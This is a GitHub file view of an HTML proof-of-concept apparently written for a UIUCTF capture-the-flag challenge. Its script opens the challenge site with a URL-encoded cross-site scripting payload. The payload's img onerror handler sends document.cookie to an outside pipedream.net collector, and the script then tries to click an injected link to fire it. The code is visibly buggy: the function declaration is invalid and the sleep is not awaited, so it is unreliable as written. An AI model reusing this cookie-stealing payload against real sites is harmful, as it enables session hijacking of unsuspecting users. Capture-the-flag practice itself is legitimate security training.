-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathuiuctf.html
18 lines (17 loc) · 1012 Bytes
/
uiuctf.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<html>
<head>
</head>
<body>
<script>
const sleep = (time) => {
return new Promise(resolve => setTimeout(resolve, time));
}
function poc = () => {
const win = window.open('https://peanut-xss-web.chal.uiuc.tf/?nutshell=%3Chtml%3E%0A%3Cbody%3E%0A%20%20%20%20%3Ch2%3ETo%20write%20a%20section%2C%3C%2Fh2%3E%0A%20%20%20%20%26%23x3C%3Bimg%20src%20onerror%3D%26%23x22%3Bwindow.location%3D%26%23x60%3Bhttps%3A%2F%2Fenktggufkorob.x.pipedream.net%2F%3Fflag%3D%24%7Bdocument.cookie%7D%26%23x60%3B%26%23x22%3B%26%23x3E%3B%0A%20%20%20%20%3Ch2%3ETo%20embed%20a%20section%2C%3C%2Fh2%3E%0A%20%20%20%20%3Cp%3Ejust%20make%20a%20link%20with%20%3Acolon%20at%20the%20front%E2%80%A6%20%3Ca%20href%3D%22%23ToWriteASection%22%20id%3D%22exploit%22%3E%3ALIKE%20THIS%3C%2Fa%3E!%3C%2Fp%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%20%20%20%20#ToWriteASection')
sleep(1500);
win.getElementById('exploit').click()
}
window.onload = poc
</script>
</body>
</html>